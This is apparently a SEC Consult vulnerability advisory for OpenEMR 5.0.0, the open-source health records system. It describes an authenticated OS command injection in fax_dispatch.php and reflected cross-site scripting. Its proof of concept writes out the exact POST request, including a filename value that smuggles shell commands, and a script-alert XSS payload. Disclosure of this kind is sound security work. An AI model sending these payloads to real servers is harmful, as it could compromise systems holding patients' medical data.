OS Command Injection & Reflected Cross Site Scripting in OpenEMR

Vendor description: ------------------- "OpenEMR is the most popular open source electronic health records and medical practice management solution. ONC certified with international usage, OpenEMR's goal is a superior alternative to its proprietary counterparts." Source: http://www.open-emr.org/ Business recommendation: ------------------------ By exploiting the vulnerability documented in this advisory, an attacker can fully compromise the web server which has OpenEMR installed. Potentially sensitive health care and medical data might get exposed through this attack. SEC Consult recommends not to attach OpenEMR to the network until a thorough security review has been performed by security professionals and all identified issues have been resolved. Vulnerability overview/description: ----------------------------------- 1.OS Command Injection Any OS commands can be injected by an authenticated attacker with any role. This is a serious vulnerability as the chance for the system to be fully compromised is very high. 2.Reflected Cross Site Scripting This vulnerability allows an attacker to inject malicious client side scripting which will be executed in the browser of users if they visit the manipulated site. There are different issues affecting various components. The flash component has not been fixed yet as OpenEMR is looking for a replacement component. Proof of concept: ----------------- 1.OS Command Injection Below is the detail of a HTTP request that needs to be sent to execute arbitrary OS commands through "fax_dispatch.php". ``` URL : http://$DOMAIN/interface/fax/fax_dispatch.php?scan=x METHOD : POST PAYLOAD : form_save=1&form_cb_copy=1&form_cb_copy_type=1&form_images[]=x&form_ filename='||<os-commands-here>||'&form_pid=1 ``` 2.Reflected Cross Site Scripting The following URL parameters have been identified to be vulnerable against reflected cross site scripting: The following payload shows a simple alert message box: a) ``` URL : http://$DOMAIN/library/openflashchart/open-flash-chart.swf METHOD : GET PAYLOAD : [PoC removed as no fix is available] ``` b) ``` URL : http://$DOMAIN/library/custom_template/ckeditor/_samples/assets/_posteddata.php METHOD : POST PAYLOAD : <script>alert('xss');</script>=SENDF ``` Vulnerable / tested versions: ----------------------------- OpenEMR version 5.0.0 has been tested. This version was the latest at the time the security vulnerability was discovered.